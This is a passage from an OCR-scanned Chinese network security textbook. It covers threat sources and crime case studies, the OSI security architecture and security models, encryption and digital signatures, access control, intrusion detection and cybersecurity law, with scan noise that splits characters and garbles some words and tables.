媒体 废弃 物 利用 媒体 废弃 物 得 到 可 利用 信息 ,以 便 非法 使 用 
网 络 信息 战 为 国家 或 集团 利益 ,通过 信息 战 进 网 络 干扰 破坏 或 灵 饰 袭击 
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【案例 1-5】 中 国 黑客 利益 产业 链 正在 形成 。 根据 从 2010 年 数据 调查 显示 ,中 国 的 木 
马 产业 链 一 年 的 收入 已 经 达到 了 上 百 亿 元 。2009 年 湖北 麻城 市 警方 破获 了 一 个 制造 传播 
木马 的 网 络 犯罪 国 伙 。 这 也 是 国内 破获 的 第 一 个 上 下 游 产业 链 完整 的 木马 犯罪 和 案件。 犯罪 
嫌疑 人 杨 某 年 仅 20 岁 , 以 “ 雪 落 的 瞬间 ”的 网 名 ,编写 并 贩卖 木马 程序 和 资料 等 。 犯 罪 嫌疑 
人 韩 某 年 仅 22 岁 , 网 上 人 称 “ 黑 色 靓 点 ”, 是 他 们 的 总 代理 。 原 本 互 不 相识 的 几 位 犯罪 嫌疑 
人 ,从 2008 年 10 月 开始 ,在 不 到 半年 的 时 间 就 非法 获 利 近 200 万 元 。 

随 着 计算 机 网 络 的 广泛 应 用 ,人 们 更 加 依赖 网 络 系统 ,同时 也 出 现 了 各 种 各 样 的 安全 问 
题 ,致使 网 络 安全 风险 更 加 突出 ,需要 认真 分 析 各 种 风险 和 威胁 的 因素 和 原因 。 

(1) 网 络 系统 本 身 的 缺陷 。 国 际 互联 网 最 初 的 设计 考虑 是 该 网 不 会 因 局 部 故障 而 影响 
信息 的 传输 ,基本 没有 考虑 安全 问题 ,由 于 网 络 的 共享 性 .开放 性 和 漏洞 ,致使 网 络 系统 和 信 
息 的 安全 存在 很 大 风险 和 隐患 ,而 且 网 络 传输 的 TCP/IP 协议 簇 缺乏 安全 机 制 。 

(2) 软件 系统 的 漏洞 和 隐患 。 软 件 系 统 人 为 设计 与 研发 无 法 避免 地 遗留 一 些 漏洞 和 隐 
患 , 随 着 软件 系统 规模 的 不 断 增 大 ,系统 中 的 安全 漏洞 或 “后 门 ”隐患 难以 避免 ,包括 常用 的 
操作 系统 ,都 存在 一 些 安全 漏洞 ,各 种 服务 器 、 浏 览 器 、 桌 面 系统 等 也 都 存在 安全 漏洞 和 
隐患 。 

(3) 黑客 攻击 及 非 授 权 访问 。 由 于 黑客 攻击 的 隐蔽 性 强 、 防 范 难度 大 破坏 性 强 ,已 经 
成 为 网 络 安全 的 主要 威胁 。 实 际 上 ,目前 针对 网 络 攻击 的 防范 技术 滞后 ,而 且 还 缺乏 极为 有 
效 的 快速 侦查 跟踪 手段 ,黑客 技术 由 于 强大 利益 链 的 驱使 ,逐渐 被 更 多 的 冒险 者 所 接受 ,应 
用 在 不 同 的 场景 中 。 

【案例 1-6】 据 美国 “天 主教 在 线 ” 网 站 称 ,美国 国家 安全 局 (NSA) 设 计 的 装置 很 小 ,可 
以 植 入 USB 连接 线 插头 ,或 在 生产 阶段 植 入 计算 机 内 。 即 使 该 计算 机 完全 不 联网 ,NSA 特 
工 操控 的 计算 机 也 可 在 8 英里 之 外 与 该 计算 机 “交流 ”, 传 输 恶 意 软 件 , 自 改 窃取 资料 ,美国 
国安 局 也 可 通过 设置 在 监视 目标 附近 的 中 继 站 接收 无 线 电波 。 

(4) 网 络 病毒 。 利 用 网 络 传 播 计算 机 病毒 ,其 破坏 性 、 影 响 性 和 传播 性 远 远 高 于 单机 系 
统 , 而 且 各 种 病毒 的 变异 和 特性 变化 ,使 网 络 用户 防 范 难度 增加 。 

(5) 防火 墙 缺 陷 。 网 络 防火 墙 可 以 较 好 地 阻止 外 网 基于 IP 包头 的 攻击 和 非 信任 地 址 
的 访问 ,但 是 , 却 无 法 控制 内 网 的 攻击 行为 ,也 无 法 阻止 基于 数据 内 容 的 黑客 攻击 和 病毒 
入侵 。 

(6) 法 律 及 管理 不 完善 。 加 强 法 律 法 规 和 管理 ,对 于 企业 .机构 及 用 户 的 网 络 安全 至 关 
重要 。 很 多 网 络 安 全 出 现 问题 的 企业 、 机 构 及 用 户 , 基 本 都 是 由 于 下 忽 了 网 站 安全 设置 与 
管理 。 


PP 1.3.2 网 络 安全 的 防护 体系 


学 习 掌 握 网 络 安全 体系 结构 和 模型 ,可 以 更 好 地 理解 网 络 安全 相关 的 各 种 体系 、 结 构 、 
关系 和 构成 要 素 等 ,有 助 于 构建 网 络 安全 体系 和 结构 ,进行 具体 的 网 络 安全 方案 的 制订 、 规 
划 、 设 计 和 实施 等 ,也 可 以 用 于 实际 应 用 过 程 的 描述 和 研究 。 
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EL 网 络 安全 的 保障 体系 
网 络 安全 保障 要 素 包括 4 个 方面 : 网 络 安全 策略 、 网 络 安 /网络 安 


管理 了 网 络 安全 \ 运作 
全 管理 、 网 络 安全 运作 和 网 络 安全 技术 ,如 图 1-6 所 示 。 (人 


网 络 安 全 
技术 


图 1-6 网 络 安全 保障 要 素 












12. OSI 网 络 安全 体系 结构 


1982 年 , 作为 基本 参考 模型 OSI (Open System 
Interconnection ,开放 系统 互联 ) 的 新 补充 ,发 布 了 OSI 安全 
体系 结构 , 即 ISO 7498-2 标准 。1990 年 ,国际 电信 联盟 (ITU) 决 定 采 用 并 作为 OSI 的 
X. 800 推荐 标准 ,我 国 相应 制定 了 GB/T 9387. 2 一 1995《 信 息 处 理 系统 开放 系统 互 连 基 本 参 
考 模型 ) 第 2 部 分 : 安全 体系 结构 。 其 实 ,OSI 安全 体系 结构 是 设计 标准 的 标准 ,并 非 实现 标 
准 。 其 体系 结构 建立 了 一 些 重要 的 结构 性 准则 ,并 定义 了 一 些 专用 术语 和 概念 ,包括 安全 服 
务 和 安全 机 制 。 

表 1-2 列 出 了 网 络 各 层 提 供 的 安全 服务 , 表 1-3 列 出 了 安全 服务 与 安全 机 制 的 关系 。 而 
OSI 网 络 安全 体系 结构 三 维 图 如 图 1-7 所 示 。 

表 1-2 网 络 各 层 提 供 的 安全 服务 


网 络 层次 数据 本 
安全 服务 物理 层 链 路 层 网 络 层 | 传输 层 | 会 话 层 | 表示 层 | ”应 用 层 


对 等 实体 鉴别 
数据 源 发 鉴别 
访问 控制 

连接 保密 性 V ~ 
无 连接 保密 性 ~ 
选择 字段 保密 性 V 
业务 流 保密 性 V Vv 
可 恢复 的 连接 完整 性 V 
不 可 恢复 的 连接 完整 性 Sh V 
数据 完整 性 | 选择 字段 的 连接 完整 性 
无 连接 完整 性 Sh V/ 
选择 字段 的 无 连接 完整 性 
数据 源 发 证 明 的 抗 抵赖 性 
交付 证 明 的 抗 抵赖 性 
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表 1-3 安全 服务 与 安全 机 制 的 关系 










































































协议 层 数字 | 访问 | 数据 | 认证 | 业务 流 
加 密 公证 
安全 服务 签名 | 控制 | 完整 性 | 交换 | 填充 
监 别 对 等 实体 鉴别 V V ~ 
数据 源 发 鉴别 V V 
访问 控制 JV 
连接 保密 性 V V 
无 连接 保密 性 V ~ 
于 代 保 宙 相 选择 字段 保密 性 V 
业务 流 保密 性 JV V Vv 
可 恢复 的 连接 完整 性 Vv V 
不 可 恢复 的 连接 完整 性 V V 
数据 完整 性 | 选择 字段 的 连接 完整 性 JV V 
无 连接 完整 性 V Vv V 
选择 字段 的 无 连接 完整 性 V V ~ 
数据 源 发 证 明 的 抗 抵赖 性 JV JV ~ V 
na 交付 证 明 的 抗 抵 赖 性 Vv JV V V 
OSI 参考 模型 
7 于 -应 用 层 
6 -十 -表示 层 
5 二 会话 层 
4 十 -传输 层 
3 十 网 络 层 
2 -十 数据 链 路 层 
1 


安全 机 制 


图 1-7 OSI 网 络 安全 体系 结构 


上 3. 常用 的 网 络 安全 模型 


利用 网 络 安全 模型 可 以 描述 和 构建 网 络 安全 体系 及 结构 ,进行 具体 的 网 络 安全 方案 的 
制订 ` 规 划 、 设 计 和 实施 等 ,也 可 以 用 于 实际 应 用 过 程 的 描述 和 研究 。 

1) P2DR 模型 

美国 ISS 公司 提出 的 动态 网 络 安全 体系 的 代表 模型 PZDR ,包含 4 个 主要 部 分 : Policy 
(安全 策略 ) .Protection( 防 护 )、Detection( 检 测 ) 和 Response( 响 应 ) ,如 图 1-8 所 示 。 

P2DR 模型 是 在 整体 的 安全 策略 的 控制 和 指导 下 ,在 综合 运用 防护 工具 (如 防火 墙 、 操 
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到 “最 安全 ”和 “风险 最 低 ” 的 状态 。 防 护 、 检 测 和 响应 组 成 一 个 完 
整 动态 的 安全 循环 ,在 安全 策略 的 指导 下 保证 信息 系统 的 安全 ,但 策略 
此 模型 忽略 了 其 内 在 的 变化 因素 。 

2) 网 络 安 全 通用 模型 

通过 国际 互联 网 将 数据 报 文 从 源 站 主机 传输 到 目的 站 主机 ， 
需要 经 过 传输 、 处 理 与 交换 。 借 助 建立 安全 的 通信 信道 ,通过 从 源 。 图 1-8 P2DR 模型 
站 经 网 络 到 目的 站 的 路 由 及 各 方 主体 交互 使 用 TCP/IP 的 通信 协议 进行 传输 ,其 网 络 安全 
通用 模型 如 图 1-9 所 示 。 


可 信 第 三 方 
报 文 _ ec 二- 报 文 
秘密 信息 通信 主体 == 三 = 二 = 寺村 通信 主体 人 一 秘密 信息 


信息 转换 信息 转换 


图 1-9 网 络 安全 通用 模型 


通常 ,需要 可 信 的 第 三 方 对 网 络 信息 进行 安全 处 理 , 主 要 是 对 各 主体 在 报 文 传输 中 的 身 
份 认证 。 为 保障 网 络 信息 传输 安全 所 提供 的 安全 服务 和 安全 机 制 ,需要 两 个 方面 技术 : 
中 对 发 送 的 信息 通过 安全 技术 进行 转换 ; @ 由 两 个 主体 共享 的 秘密 信息 ,要 求 加 密 开放 网 络 。 

3) 网 络 访问 安全 模型 

对 非 授权 访问 的 安全 机 制 可 分 为 两 类 : 四 网 闸 功能 ,包括 基于 口令 的 登录 过 程 ,以 拒绝 
所 有 非 授 权 访问 ,以 及 屏蔽 逻辑 检测 ,拒绝 病毒 .蠕虫 和 其 他 类 似 攻击 ; @ 内 部 的 安全 控制 ， 
一 旦 非 授权 用 户 或 软件 攻击 窃取 访问 权 , 第 二 道 防线 将 对 其 进行 防御 ,包括 各 种 内 部 控制 的 
监控 和 分 析 , 对 入 侵 者 进行 检测 ,如 图 1-10 所 示 。 


pe Pope 访 放 入 iX 
软件 硬件 数据 资源 及 进程 es 国 


作 系 统 、 身 份 认证 ,加 密 等 ) 的 同时 ,利用 检测 工具 (如 漏洞 评估 、 入 
侵 检 测 等 ;了解 和 评估 系统 的 安全 状态 ,通过 恰当 处 理 将 系统 调整 4 
安全 
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网 曾 功能 外 部 网 
图 1-10 网 络 访问 安全 模型 
4) 网 络 安全 防御 模型 
网 络 安全 的 关键 是 预防 ,“ 防 患 于 未 然 " 是 最 好 的 保障 ,同时 做 好 内 网 与 外 网 的 隔离 保 
护 。 通 过 如 图 1-11 所 示 的 网 络 安 全 防御 模型 ,可 以 构建 保护 内 网 的 系统 。 
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MAIL 服 务 器 。 漏洞 扫描 服务 器 互联 网 
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图 1-11 网 络 安全 防御 模型 


PP 1.3.3 数据 保密 技术 


信息 安全 技术 的 核心 是 数据 保密 ,一 般 就 是 人 们 常 说 的 密码 技术 。 随 着 计算 机 网 络 技 
术 不 断 发 展 ,工业 化 与 信息 化 的 融合 及 “互联 网 十 "深入 各 个 领域 ,密码 学 的 应 用 也 随 之 扩 
大 。 数 字符 名 、 身 份 认证 等 都 是 由 密码 学 派生 出 来 的 新 技术 。 


Li 数据 加 密 


数据 加 密 是 一 门 历史 悠久 的 技术 , 指 通过 加 密 算 法 和 加 密 密 钥 将 明文 转变 为 密 文 ,而 解 
密 则 是 通过 解密 算法 和 解密 密 钥 将 密 文 恢复 为 明文 。 它 的 核心 是 密码 学 。 

数据 加 密 目 前 仍 是 计算 机 系统 对 信息 进行 保护 的 一 种 最 可 靠 的 办 法 。 它 利用 密码 技术 
对 信息 进行 加 密 , 实 现 信息 隐蔽 ,从 而 起 到 保护 信息 的 安全 的 作用 。 

传统 加 密 方 法 有 两 种 : 蔡 换 和 置换 。 蔡 换 是 指使 用 密 钥 将 明文 中 的 每 一 个 字符 转换 为 
密 文中 的 一 个 字符 ,而 置换 仅 将 明文 的 字符 按 不 同 的 顺序 重新 排列 。 单 独 使 用 这 两 种 方法 
的 任意 一 种 都 是 不 够 安全 的 ,但 是 将 这 两 种 方法 结合 起 来 就 能 提供 相当 高 的 安全 程度 。 数 
据 加 密 标准 (Data Encryption Standard,DES) 就 采用 了 这 种 结合 算法 , 它 由 IBM 制定 ,并 在 
1977 年 成 为 美国 官方 加 密 标准 。 

多 年 来 ,许多 人 都 认为 DES 并 不 是 真 的 很 安全 。 事 实 上 ,即使 不 采用 智能 的 方法 , 随 着 
快速 ,高度 并 行 的 处 理 器 的 出 现 ,强制 破解 DES 也 是 可 能 的 .“ 公 开 密 钥 加 密 方法 使 DES 
以 及 类 似 的 传统 加 密 技 术 过 时 了 。 公 开 密 钥 加 密 方 法 中 ,加 密 算 法 和 加 密 密 钥 都 是 公开 的 ， 
任何 人 都 可 将 明文 转换 成 密 文 。 但 是 相应 的 解密 密 钥 是 保密 的 (公开 密 钥 方法 包括 两 个 密 
钥 ,分 别 用 于 加 密 和 解密 ) ,而 且 无 法 从 加 密 密 钥 推导 出 ,因此 ,即使 是 加 密 者 未 被 授权 也 无 
法 执行 相应 的 解密 。 
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有 2. 数字 签名 


密码 技术 除了 提供 信息 的 加 密 解 密 外 ,还 提供 鉴别 信息 来 源 \、 保 证 信息 的 完整 和 不 可 否 
认 等 功能 ,而 这 些 功 能 都 是 通过 数字 签名 来 实现 的 。 

数字 签名 的 原理 是 将 要 传送 的 明文 通过 散 列 函 数 运算 转换 成 报 文摘 要 , 报 文摘 要 用 发 
送 方 的 私 钥 加 密 后 与 明文 一 起 传送 给 接收 方 ,接收 方 再 用 发 送 方 的 公 钥 解密 ,获得 数字 签 
名 。 同 时 ,接收 方 将 接收 的 明文 产生 新 的 报 文摘 要 ,与 发 送 方 发 来 的 报 文摘 要 解密 相 比 较 ， 
结果 一 致 ,表示 明文 未 被 改动 ,如 果 不 一 致 , 则 表示 明文 已 被 算 改 。 


1:. 数据 加 密 传输 


虚拟 专用 网 (Virtual Private Network,VPN) 是 现在 比较 广泛 应 用 的 加 密 传输 手段 ,在 
公共 网 络 中 建立 私有 专用 网 络 ,数据 通过 安全 的 “加 密 管道 在 公共 网 络 中 传输 。 虚 拟 专用 
网 使 用 公用 网 连接 , 像 专线 一 样 使 用 。 通 过 原 有 的 Internet 服务 ,就 能 实现 与 局 域 网 同等 效 
果 的 虚拟 专用 网 ,主要 采用 IPSec 协议 与 加 密 技术 来 实现 。 

另外 ,在 实际 应 用 中 ,还 有 一 些 其 他 数据 加 密 设备 ,如 专用 数据 加 密 机 等 。 


PP 1.3.4 访问 控制 技术 


访问 控制 的 主要 目的 是 限制 访问 主体 对 客体 的 访问 ,从 而 保障 数据 资源 在 合法 范围 内 
得 以 有 效 使 用 和 管理 。 为 了 达到 上 述 目 的 ,访问 控制 需要 完成 两 个 任务 : 识别 和 确认 访问 
系统 的 用 户 ,决定 该 用 户 可 以 对 某 一 系统 资源 进行 何 种 类 型 的 访问 。 

访问 控制 包括 三 个 要 素 : 主体 、 客 体 和 控制 策略 。 

(1) 主体 (Subject) 。 是 指 提 出 访问 资源 具体 请 求 。 是 某 一 操作 动作 的 发 起 者 ,但 不 一 
定 是 动作 的 执行 者 ,可 能 是 某 一 用 户 , 也 可 以 是 用 户 启 动 的 进程 .服务 和 设备 等 。 

(2) 客体 (Object)。 是 指 被 访问 资源 的 实体 。 所 有 可 以 被 操作 的 信息 、 资 源 、 对 象 都 可 
以 是 客体 。 客 体 可 以 是 信息 、 文 件 、 记 录 等 集合 体 ,也 可 以 是 网 络 上 硬件 设施 、 无 限 通 信 中 的 
终端 ,甚至 可 以 包含 另外 一 个 客体 。 

(3) 控制 策略 (Attribution) 。 是 主体 对 客体 的 相关 访问 规则 集合 , 即 属性 集合 。 访 问 策 
略 体现 了 一 种 授权 行为 ,也 是 客体 对 主体 某 些 操作 行为 的 默认 。 

访问 控制 的 主要 功能 包括 : 保证 合法 用 户 访问 受权 保护 的 网 络 资源 ,防止 非法 的 主体 
进入 受 保护 的 网 络 资源 ,或 防止 合法 用 户 对 受 保护 的 网 络 资源 进行 非 授 权 的 访问 。 访问 控 
制 首先 需要 对 用 户 身份 的 合法 性 进行 验证 ,同时 利用 控制 策略 进行 选用 和 管理 工作 。 当 用 
户 身份 和 访问 权限 验证 之 后 ,还 需要 对 越权 操作 进行 监控 。 因 此 ,访问 控制 的 内 容 包 括 认 
证 ,控制 策略 实现 和 安全 审计 ,三 者 的 主要 功能 如 下 。 

(1) 认证 。 包 括 主体 对 客体 的 识别 及 客体 对 主体 的 检验 确认 。 

(2) 控制 策略 。 通 过 合理 地 设 定 控制 规则 集合 ,确保 用 户 对 信息 资源 在 授权 范围 内 的 
合法 使 用 。 既 要 确保 授权 用 户 的 合理 使 用 .又 要 防止 非法 用 户 侵权 进入 系统 .使 重要 信息 资 
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源 泄露 。 同 时 对 合法 用 户 , 也 不 能 越权 行使 权限 以 外 的 功能 及 访问 范围 。 

(3) 安全 审计 。 系 统 可 以 自动 根据 用 户 的 访问 权限 ,对 计算 机 网 络 环境 下 的 有 关 活 动 
或 行为 进行 系统 的 、 独 立 的 检查 验证 ,并 做 出 相应 评价 与 审计 。 

访问 控制 策略 主要 包括 如 下 内 容 。 

(1) 入 网 访问 控制 。 入 网 访问 控制 是 网 络 访问 的 第 一 层 访问 控制 。 对 用 户 可 规定 所 能 
登入 到 的 服务 器 及 获取 的 网 络 资源 .控制 准许 用 户 人 网 的 时 间 和 登入 人 网 的 工作 站 点 。 用 
户 的 入网 访问 控制 分 为 用 户 名 和 口令 的 识别 与 验证 ,用户 账号 的 默认 限制 检查 。 该 用 户 若 
有 任何 一 个 环节 检查 未 通过 ,就 无 法 登 人 网 络 进行 访问 。 

(2) 网 络 的 权限 控制 。 网 络 的 权限 控制 是 防止 网 络 非法 操作 而 采取 的 一 种 安全 保护 措 
施 。 用 户 对 网 络 资源 的 访问 权限 通常 用 一 个 访问 控制 列表 来 描述 。 

从 用 户 的 角度 ,网 络 的 权限 控制 可 分 为 以 下 3 类 用 户 。 

Q@ 特殊 用 户 。 具 有 系统 管理 权限 的 系统 管理 员 等 。 

@ 一 般 用 户 。 系 统管 理 员 根据 实际 需要 而 分 配 到 一 定 操作 权限 的 用 户 。 

@ 审计 用 户 。 专 门 负责 审计 网 络 的 安全 控制 与 资源 使 用 情况 的 人 员 。 

(3) 目录 级 安全 控制 。 目 录 级 安全 控制 主要 是 为 了 控制 用 户 对 目录 、 文 件 和 设备 的 访 
问 , 或 指定 对 目录 下 的 子 目录 和 文件 的 使 用 权限 。 用 户 在 目录 一 级 制定 的 权限 对 所 有 目录 
下 的 文件 仍然 有 效 ,还 可 进一步 指定 子 目录 的 权限 。 在 网 络 和 操作 系统 中 ,常见 的 目录 和 文 
件 访问 权限 有 系统 管理 员 权 限 (Supervisor)、 读 权限 (Read)、 写 权限 (Write)、 创 建 权限 
(Create) 、 删 除权 限 (Erase)、 修 改 权 限 (Modify)、 文 件 查找 权限 (File Scan)、 控 制 权 限 
(Access Control) 等 。 一 个 网 络 系统 管理 员 应 为 用 户 分 配 适当 的 访问 权限 ,以 控制 用 户 对 服 
务 器 资源 的 访问 ,进一步 强化 网 络 和 服务 器 的 安全 。 

(4) 属性 安全 控制 。 属 性 安全 控制 可 将 特定 的 属性 与 网 络 服务 器 的 文件 及 目录 网 络 设 
备 相关 联 。 在 权限 安全 的 基础 上 ,对 属性 安全 提供 更 进一步 的 安全 控制 。 网 络 上 的 资源 都 
应 先 标示 其 安全 属性 ,将 用 户 对 应 网 络 资源 的 访问 权限 存 人 访问 控制 列表 中 ,记录 用 户 对 网 
络 资源 的 访问 能 力 ,以 便 进行 访问 控制 。 

属性 配置 的 权限 包括 向 某 个 文件 写 数据 .复制 一 个 文件 .删除 目录 或 文件 .查看 目录 和 
文件 .执行 文件 、 隐 含 文件 共享、 系统 属性 等 。 安 全 属性 可 以 保护 重要 的 目录 和 文件 ,防止 
用 户 越权 对 目录 和 文件 的 查看 .删除 和 修改 等 。 

(5) 网 络 服务 器 安全 控制 。 网 络 服务 器 安全 控制 允许 通过 服务 器 控制 台 执行 的 安全 控 
制 操作 包括 用 户 利 用 控制 台 装 载 和 外 载 操 作 模块 .安装 和 删除 软件 等 。 操 作 网 络 服务 器 的 
安全 控制 还 包括 设置 口令 锁定 服务 器 控制 台 , 主 要 防止 非法 用 户 修改 .删除 重要 信息 。 另 
外 ,系统 管理 员 还 可 通过 设 定 服务 器 的 登入 时 间 限 制 、 非 法 访问 者 检测 ,以 及 关闭 的 时 间 间 
隔 等 措施 ,对 网 络 服务 器 进行 多 方位 的 安全 控制 。 

(6) 网 络 监控 和 锁定 控制 。 在 网 络 系统 中 ,通常 服务 器 自动 记录 用 户 对 网 络 资源 的 访 
问 , 如 有 非法 的 网 络 访问 ,服务 器 将 以 图 形 文字 或 声音 等 形式 向 网 络 管理 员 报 警 ,以 便 引 起 
警觉 进行 审查 。 对 试图 登 人 网 络 者 ,网 络 服务 器 将 自动 记录 企图 登 人 网 络 的 次 数 , 当 非 法 访 
问 的 次 数 达 到 设 定 值 时 ,就 会 将 该 用 户 的 账户 自动 锁定 并 进行 记载 。 
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(7) 网 络 端口 和 节点 的 安全 控制 。 网 络 中 服务 器 的 端口 常用 自动 回复 器 、 静 默 调制 解 
调 器 等 安全 设施 进行 保护 ,并 以 加 密 的 形式 来 识别 节点 的 身份 。 自 动 回复 器 主要 用 于 防范 
假冒 合法 用 户 ,静默 调制 解 调 器 用 于 防范 黑客 利用 自动 拨号 程序 进行 网 络 攻击 。 还 应 经 常 
对 服务 器 端 和 用 户 端 进行 安全 控制 ,如 通过 验证 器 检测 用 户 真实 身份 ,然后 ,用 户 端 和 服务 
器 再 进行 相互 验证 。 


PP 1.3.5 网 络 监控 


网 络 安全 体系 的 监控 和 响应 环节 是 通过 入 侵 检测 (IDS) 来 实现 的 。IDS 从 网 络 系统 中 
的 关键 点 收集 信息 ,并 加 以 分 析 , 检 测 网 络 中 是 不 是 有 违反 安全 策略 的 行为 和 识别 遵 受 袭 击 
的 迹象 。 作 为 网 络 安全 核心 技术 ,入 侵 检测 技术 可 以 缓解 访问 隐患 ,将 网 络 安全 的 各 个 环节 
有 机 地 结合 起 来 ,实现 对 用 户 网 络 安全 的 有 效 保障 。 

入 侵 检测 分 为 基于 主机 的 人 侵 检测 CHIDS) 和 基于 网 络 的 入 侵 检测 (NIDS) 两 种 。 
HIDS 置 于 被 监测 的 主机 系统 上 ,监测 用 户 的 访问 行为 ; NIDS 置 于 被 监测 的 网 段 上 ,监听 网 
段 内 的 所 有 数据 包 , 判 断 其 是 否 合法 。 


> 1.3.6 木马 和 病毒 的 防护 


随 着 木马 和 病毒 种 类 和 数量 的 迅猛 增长 ,其 危害 和 破坏 性 也 越 来 越 大 ,对 木马 和 病毒 的 
防护 力度 也 越 来 越 大 。 目 前 有 针对 单机 的 防护 系统 ,也 有 网 络 版 的 防护 系统 。 


1.4 网 络 安全 的 法 律 法 规 


法 律 法 规 是 网 络 安全 体系 的 重要 保障 和 基石 ,鉴于 国内 外 具体 的 法 律 法 规 较 多 ,下 面 仅 
概述 其 要 点 。 


有 1. 国外 网 络 安全 相关 的 法 律 法 规 


1) 国际 合作 立法 保障 网 络 安全 

(1) 国际 立法 打击 网 络 犯罪 。 很 多 国家 在 20 世纪 90 年 代 后 ,为 了 有 效 打击 利用 计算 机 
网 络 进行 的 各 种 违法 犯罪 活动 ,采取 了 法 律 手段 。 欧 盟 已 成 为 国际 规范 的 典范 ,在 2000 年 
颁布 (网 络 刑事 公约 (草案 )》, 现 已 有 43 个 国家 (包括 美国 .日 本 等 ) 借 鉴 了 这 一 公约 草案 。 
在 不 同 国家 的 刑事 立法 中 ,印度 的 有 关 作法 具有 一 定 代 表 性 ,于 2000 年 6 月 颁布 了 《信息 技 
术 法 》, 制 定 出 一 部 规范 计算 机 网 络 安全 的 基本 法 。 

此 外 ,还 有 一 些 国家 修订 了 原 有 的 刑法 ,以 适应 保障 计算 机 网 络 安全 的 需要 。 

(2) 数字 化 技术 保护 。1996 年 12 月 ,世界 知识 产权 组 织 做 出 了 “禁止 擅自 破解 他 人 数 
字 化 技术 保护 措施 ”的 规定 ,以 此 作为 保障 网 络 安全 的 一 项 主要 内 容 进 行规 范 。 现 在 ,欧盟 、 
日 本 、 美 国 等 大 多 数 国家 都 将 其 作为 一 种 网 络 安全 保护 规定 ,纳入 本 国 的 法 律 之 中 。 

(3) 电子 交易 法 。1996 年 12 月 联合 国 第 51 次 大 会 ,通过 了 联合 国贸 易 法 委员 会 的 ( 电 
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子 商务 示范 法 ), 对 于 网 络 市 场 中 的 数据 电文 .网 上 合同 成 立 及 生效 的 条 件 ,传输 等 专项 领域 
的 电子 商务 等 ,都 做 了 十 分 明确 具体 的 规范 。 

【案例 1-7】 网 络 犯 罪案 件 不 断 上 升 。 瑞 星 公司 曾经 在 其 发 布 的 (中 国电 脑病 毒 疫情 互 
联网 安全 报告 ) 中 称 ,黑客 除了 通过 木马 程序 窃取 他 人 隐私 外 ,更 多 的 是 谋求 经 济 利益 ， 
2007 年 ,病毒 (木马 ) 背 后 所 带 来 的 巨大 的 经 济 利益 催生 了 病毒 “工业 化 ”入 侵 的 进程 ,并 形 
成 了 数 亿 元 的 产业 链 。“ 熊 猫 烧香 ”的 程序 设计 者 李 俊 被 警方 抓获 后 ,承认 每 天 入 账 收入 近 
万 元 , 共 获 利 上 千 万 元 。 腾 讯 QQ 密码 被 盗 成 为 黑客 的 重 灾区 ,高 峰 时 每 天 约 10 万 人 次 。 

2) 综合 性 和 原则 性 的 基本 法 

世界 一 些 国家 ,除了 制定 保障 网 络 健 康 发 展 的 法 规 以 外 ,还 专门 制定 了 综合 性 的 ,原则 
性 的 网 络 基本 法 。 近 年 来 ,西欧 国家 和 日 本 制定 了 一 大 批 促进 信息 网 络 在 本 国 顺利 发 展 的 
专门 法 律 法规 ,同时 大 量 修订 了 现 有 法 律 ,以 适应 网 络 安全 的 需要 。 

3) 行业 自律 .民间 管理 及 道德 规范 

国际 上 各 国 在 规范 网 络 行为 方面 ,都 很 注重 发 挥 民 间 组 织 的 作用 ,特别 是 行业 自律 作 
用 。 德 国 、 英 国 、 澳 大 利 亚 等 ,学 校 中 网 络 使 用 的 “行业 规范 ”十 分 严格 。 

很 多 国家 注重 以 法 律 规范 网 络 行为 ,都 明确 网 络 服务 提供 者 的 责任 ,基本 都 采用 了 “ 避 
风 港 ?制度 。 如 一 旦 网 络 服务 提供 者 的 行为 符合 某 一 法 律 条 款 , 将 不 再 与 网 上 的 违法 分 子 一 
同 负 违 法 的 连带 责任 ,不 会 与 犯罪 分 子 一 道 作为 共犯 处 理 ,以 有 利于 网 络 的 健康 发 展 。 





12. 我 国 网 络 安全 相关 的 法 律 法 规 


我 国 网 络 安全 立法 体系 分 为 以 下 三 个 层面 。 

(1) 第 一 层面 : 法 律 。 我 国 与 网 络 信息 安全 相关 的 法 律 主要 有 :《 宪 法 兴 刑 法 兴 治安 管 
理 处 罚 条 例 兴 刑事 诉讼 法 兴国 家 安全 法 兴 保 守 国 家 秘密 法 兴 行 政 处 罚 法 兴 行政 诉讼 法 兴 全 
国人 大 常委 会 关于 维护 互联 网 安全 的 决定 兴 人 民警 察 法 兴 行 政 复议 法 兴国 家 赔偿 法 兴 立 法 
法 ) 等 。 

(2) 第 二 层面 : 行政 法 规 。 行 政法 规 主要 有 《中 华人 民 共 和 国 计 算 机 信息 系统 安全 保护 
条 例 兴 中 华人 民 共 和 国 计 算 机 信息 网 络 国际 联网 管理 暂行 规定 兴 计 算 机 信息 网 络 国际 联网 
安全 保护 管理 办 法 兴 商 用 密码 管理 条 例 兴 中 华人 民 共 和 国电 信条 例 兴 互联 网 信息 服务 管理 
办 法 兴 计 算 机 软件 保护 条 例 ) 等 。 

(3) 第 三 层面 : 国务 院 部 委 及 地 方 性 法 规 、 规 章 、 规 范 性 文件 。 

Q@ 公安 部 制定 的 (计算 机 信息 系统 安全 专用 产品 检测 和 销售 许可 证 管理 办 法 兴 计 算 机 
病毒 防治 管理 办 法 兴 金 融 机 构 计 算 机 信息 系统 安全 保护 工作 暂行 规定 兴 关 于 开展 计算 机 安 
全 员 培 训 工 作 的 通知 ) 等 。 

@ 工业 和 信息 化 部 制定 的 (互联 网 电 户 公告 服务 管理 规定 兴 软 件 产品 管理 办 法 兴 计算 
机 信息 系统 集成 资质 管理 办 法 兴国 际 通信 出 人 口 局 管理 办 法 兴国 际 通信 设施 建设 管理 规 
定 兴 中 国 互联 网 络 域名 管理 办 法 兴 电 信 网 间 互 联 管理 暂行 规定 ) 等 。 
国家 互联 网 应 急 中 心 与 中 国 互联 网 协会 ,组 织 相关 专家 、 学 者 及 数 十 家 互联 网 从 业 机 构 
共同 研究 .探讨 计算 机 网 络 病毒 防治 及 反 网 络 病毒 行业 自律 工作 ,倡导 互联 网 企业 和 网 民 遵 
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守 公约 ,自觉 抵制 网 络 病毒 的 制造 、 传 播 和 使 用 。 
1.5 网 络 安全 评估 准则 及 测评 


P 1.5.1 评价 标准 


计算 机 信息 系统 安全 产品 种 类 繁多 ,功能 也 各 不 相同 , 随 着 信息 安全 产品 日 益 增多 ,为 
了 更 好 地 对 信息 安全 产品 的 安全 性 进行 客观 评价 ,以 满足 用 户 对 安全 功能 和 保证 措施 的 多 
种 需求 ,便于 同类 安全 产品 进行 比较 ,许多 国家 都 分 别 制定 了 各 自 的 信息 安全 评价 标准 。 典 
型 的 信息 安全 评价 标准 主要 如 下 。 

(1) 美国 国防 部 颁布 的 (可 信 计 算 机 系统 评价 标准 》。 

